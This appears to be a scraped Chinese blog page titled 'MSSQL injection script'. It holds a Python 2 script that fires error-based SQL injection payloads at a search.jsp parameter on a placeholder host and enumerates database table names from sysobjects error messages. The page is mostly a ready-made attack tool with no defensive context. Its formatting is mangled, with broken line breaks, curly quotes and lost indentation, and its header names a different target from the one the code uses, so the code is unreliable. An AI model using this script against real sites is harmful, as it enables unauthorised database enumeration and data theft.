mssql-注入脚本
时间:2021-07-01 10:21:17
帮助过:23人阅读
coding:utf-8
#Author:LSA
#Description:hishop sqli for /user/UserRefundApply?OrderId=
#Date:20190701
import sys
import requests
from bs4
import BeautifulSoup
import re
headers =
{
‘Cookie‘:
‘‘,
‘User-Agent‘:
‘Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36‘
}
global tables_name
tables_name =
"‘XWCMFLOWACTION‘"
#print tables_name
def brute_tables(url):
for i
in range(0,300
):
url =
‘http://www.xxx.com/search/search.jsp?doctitle=100%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(‘ + tables_name +
‘))%3E0--‘
print url
rsp = requests.get(url,headers=
headers)
soup = BeautifulSoup(rsp.text,
"lxml")
title =
soup.p.text
print title
table_name = re.findall(r
"‘(.*?)‘",title)
print table_name
print table_name[0]
global tables_name
tables_name = tables_name +
‘,\‘‘ + table_name[0] +
‘\‘‘
print tables_name
def main(url):
brute_tables(url)
if __name__ ==
‘__main__‘:
url =
‘http://www.xxx.com/search/search.jsp?doctitle=100%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(‘ + tables_name +
‘))%3E0--‘
main(url)
mssql-注入脚本
标签:code rgb mss pre HERE gecko find win64 title
